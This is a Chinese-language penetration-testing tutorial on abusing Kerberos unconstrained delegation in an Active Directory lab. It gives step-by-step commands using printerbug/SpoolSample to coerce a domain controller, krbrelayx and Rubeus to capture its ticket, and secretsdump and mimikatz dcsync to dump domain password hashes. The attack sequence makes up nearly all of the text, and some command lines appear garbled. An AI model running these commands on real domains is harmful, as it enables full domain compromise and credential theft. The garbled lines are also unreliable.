内网渗透—非约束委派

环境搭建

1、搭建域控制器

2、创建域用户：xxxxxxx

3、授予普通域用户修改和读取SPN权限

https://www.freebuf.com/sectool/252329.html

4、使用xxxxxxx用户注册SPN。

setspn -U -A mysql/linux.htb.com htb.comxxxxxxx

SPN即为服务对象的唯一标识，其中服务用户为xxxxxxx，服务所在的主机为linux.htb.com

6、域控开启打印机服务。

漏洞利用

利用方式1

1、检测域控是否启动打印机。

rpcdump.py @192.168.135.183 | grep MS-RPRN

2、添加SPN记录

因为我们是在linux机器上，所以需要使用域用户在当前的linux机器上注册SPN服务。

python3 addspn.py -u "htb.comxxxxxxx" -p "xxxxxxx" -s host/linux.htb.com 192.168.135.183

3、在linux机器上添加对应的dns解析记录。

python3.6 dnstool.py -u "htb.comadministrator" -p xxxxxxx -r linux.htb.com  -a add -d 192.168.135.129192.168.135.183

4、触发打印机错误

python3 printerbug.py htb.com/xxxxxxx@192.168.135.183  linux.htb.com

5、开启中继，捕获票据。

python3 krbrelayx.py -p "xxxxxxx" -s xxxxxxx

6、导入票据

export [email protected][email protected]

7、获取dc主机上的用户hash

python3 /root/桌面/impacket/examples/secretsdump.py -k dc.htb.com -just-dc-user administrator

利用方式2

SpoolSample.exe dc fileserver
Rubeus.exe monitor /interval:1 /filteruser:dc$

抓取票据

mimikatz "privilege::debug""sekurlsa::tickets /export""exit"

此时可能抓取不到票据，所以使用Rubeus.exe将票据注入内存。

Rubeus.exe ptt /ticket:

此时使用mimikazi将票据从内存中提取出来

mimikatz "privilege::debug""sekurlsa::tickets /export""exit"

将票据注入当前会话

mimikatz "kerberos::ptt [0;5736b][email protected]"

导出域控hash

mimikatz "lsadump::dcsync /domain:htb.com /all /csv""exit"

漏洞总结

1、非约束委派攻击，需要主机配置了非约束委派而不是服务账户配置了约束委派。

主机账户配置非约束委派才能导出登陆该主机上用户的TGT。

2、一般来说使用SpoolSample迫使域控回连目标主机回发生错误，一般使用linux的printbug来触发回连。

3、在触发打印机回连接当前主机的时候，如果使用Rubeus.exe来获取票据，在当前主机使用mimikazi是获取不到文本形式的TGT票据。如果要获取文本形式的票据，只需要向域控发起打印机请求使其回连当前主机，然后使用mimikzi抓取即可，无需使用Rubeus.exe来监控获取tgt票据，也就是说两者即可使用其中一个。

https://blog.csdn.net/qq_43645782/article/details/118762916